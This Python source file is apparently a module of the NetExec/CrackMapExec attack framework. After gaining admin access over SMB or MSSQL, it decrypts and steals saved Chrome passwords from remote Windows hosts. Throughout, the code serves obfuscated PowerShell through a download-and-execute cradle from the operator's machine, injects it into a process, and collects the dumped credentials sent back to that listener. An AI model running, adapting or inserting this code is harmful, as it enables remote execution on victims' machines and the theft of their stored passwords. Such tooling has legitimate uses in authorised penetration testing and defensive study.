NetExec/cme/modules/enum_chrome.py

from cme.helpers.powershell import *
from cme.helpers.logger import write_log
from datetime import datetime
from io import StringIO

class CMEModule:
    '''
        Executes Get-ChromeDump to decrypt saved chrome credentials
        Module by @byt3bl33d3r
    '''

    name = 'enum_chrome'
    description = "Decrypts saved Chrome passwords using Get-ChromeDump"
    supported_protocols = ['smb', 'mssql']
    opsec_safe = False
    multiple_hosts = True

    def options(self, context, module_options):
        '''
        '''

        self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
        self.ps_script2 = obfs_ps_script('randomps-scripts/Get-ChromeDump.ps1')

    def on_admin_login(self, context, connection):

        command = 'Get-ChromeDump | Out-String'
        chrome_cmd = gen_ps_iex_cradle(context, 'Get-ChromeDump.ps1', command)

        launcher = gen_ps_inject(chrome_cmd, context)

        connection.ps_execute(launcher)
        context.log.success('Executed payload')

    def on_request(self, context, request):
        if 'Invoke-PSInject.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.wfile.write(self.ps_script1)

        elif 'Get-ChromeDump.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.wfile.write(self.ps_script2)

        else:
            request.send_response(404)
            request.end_headers()

    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.get('content-length'))
        data = response.rfile.read(length).decode()

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            for line in buf:
                context.log.highlight(line)

            log_name = 'ChromeDump-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name))

    #def on_shutdown(self, context):
        #context.info('Removing SQLite assembly file')
        #connection.ps_execute('')